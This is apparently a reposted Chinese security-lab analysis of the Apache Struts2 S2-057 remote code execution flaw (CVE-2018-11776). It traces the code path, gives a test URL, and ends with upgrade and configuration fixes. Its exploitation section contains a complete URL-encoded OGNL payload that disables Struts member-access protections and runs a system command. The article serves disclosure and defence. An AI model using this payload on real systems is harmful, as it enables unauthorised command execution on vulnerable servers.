Home >Operation and Maintenance >Safety >How to perform Apache Struts2 S2-057 remote code execution vulnerability analysis

How to perform Apache Struts2 S2-057 remote code execution vulnerability analysis

PHPz
PHPzforward
2023-05-15 21:43:041985browse

Preface

The Apache Struts framework is an open source project based on the Web application framework of Java Servlets, JavaBeans, and JavaServer Pages (JSP). Struts is based on the design of Model-View-Controller (MVC) Patterns can be used to build complex web applications. It allows us to decompose the code of an application's business logic, control logic and presentation logic, making it more reusable and maintainable. The Struts framework is part of the Jakarta project and is managed by the Apache Software Foundation.

Tianrongxin Alpha Lab will bring you Apache Struts2 S2-057 remote code execution vulnerability analysis~

1. Vulnerability description

When struts.mapper.alwaysSelectFullNamespace is set to true, and the namespace value of the package tab and the param tab of result is missing, or wildcards are used, the namespace can be controlled, and eventually the namespace will be brought into the OGNL statement for execution. This creates a remote code execution vulnerability.

1. Affected system versions

Apache Struts 2.3 - Struts 2.3.34

Apache Struts 2.5 - Struts 2.5.16

2. Vulnerability No.

CVE-2018-11776

2. Environment setup

1. Download: http://archive.apache.org/dist/struts/2.3.34/ struts-2.3.34-all.zip

2. Modify the configuration file struts-actionchaining.xml

This vulnerability has multiple attack vectors including:

Redirect action

Action chaining

Postback result

Take the first one as an example, modify the configuration file content as:

如何进行Apache Struts2 S2-057远程代码执行漏洞分析

3. Vulnerability details

In the parseNameAndNamespace method of the DefaultActionMapper class.

如何进行Apache Struts2 S2-057远程代码执行漏洞分析

When alwaysSelectFullNamespace is set to true, the value of namespace is obtained from the URL. The URL is controllable, so the namespace is also controllable.

After the Action is executed, the program will call the execute() method in the ServletActionRedirectResult class to parse the redirect Result.

如何进行Apache Struts2 S2-057远程代码执行漏洞分析

First, when namespace is empty, call invocation.getProxy().getNamespace() to assign a value to the variable namespace, and then pass the variable namespace into the ActionMapping constructor.

如何进行Apache Struts2 S2-057远程代码执行漏洞分析

Then, ActionMapper.getUriFromActionMapping() reorganizes the value after ActionMapping, generates a URL string (including namespace), and assigns it to the tmplocation variable.

如何进行Apache Struts2 S2-057远程代码执行漏洞分析

Then the tmplocation with namespace is passed into the setLocation() method.

如何进行Apache Struts2 S2-057远程代码执行漏洞分析

This method assigns the tmpLocation value to the location variable in the StrutsResultSupport class.

Then, trace the super.execute() method.

如何进行Apache Struts2 S2-057远程代码执行漏洞分析

Continue to track super.execute() in the ServletActionResult class.

如何进行Apache Struts2 S2-057远程代码执行漏洞分析

In the execute() method in the StrutsResultSupport class, the location variable (with namespace) that was just assigned is passed into the conditionalParse() method.

如何进行Apache Struts2 S2-057远程代码执行漏洞分析

In the end, OGNL parsing of the namespace through TextParseUtil.translateVariables() resulted in a remote code execution vulnerability.

4. Vulnerability Exploitation

1. Access the address whose url is /${(111 111)}/actionChain1.action.

如何进行Apache Struts2 S2-057远程代码执行漏洞分析

Access triggers the OGNL expression, the url changes to /222/register2.action, and the vulnerability exists.

2. Payload:

%24%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request%5b%27struts.valueStack%27%5d.context).(%23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ou%3d%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23cmd%3d%40java.lang.Runtime%40getRuntime().exec(%22calc%22))%7d

This payload is only applicable to the 2.3 series version.

如何进行Apache Struts2 S2-057远程代码执行漏洞分析

5. Repair suggestions

1. Official patch

Currently, the official has released the latest version to fix this vulnerability. Affected users Please upgrade to Apache Struts 2.3.35 or Struts 2.5.17 version as soon as possible: https://struts.apache.org/download.cgi#struts2517.

2. Manual repair

Modify the configuration file:

Fix the namespace value of the package tag and the param tag of result, and prohibit the use of wildcards.

The above is the detailed content of How to perform Apache Struts2 S2-057 remote code execution vulnerability analysis. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:yisu.com. If there is any infringement, please contact admin@php.cn delete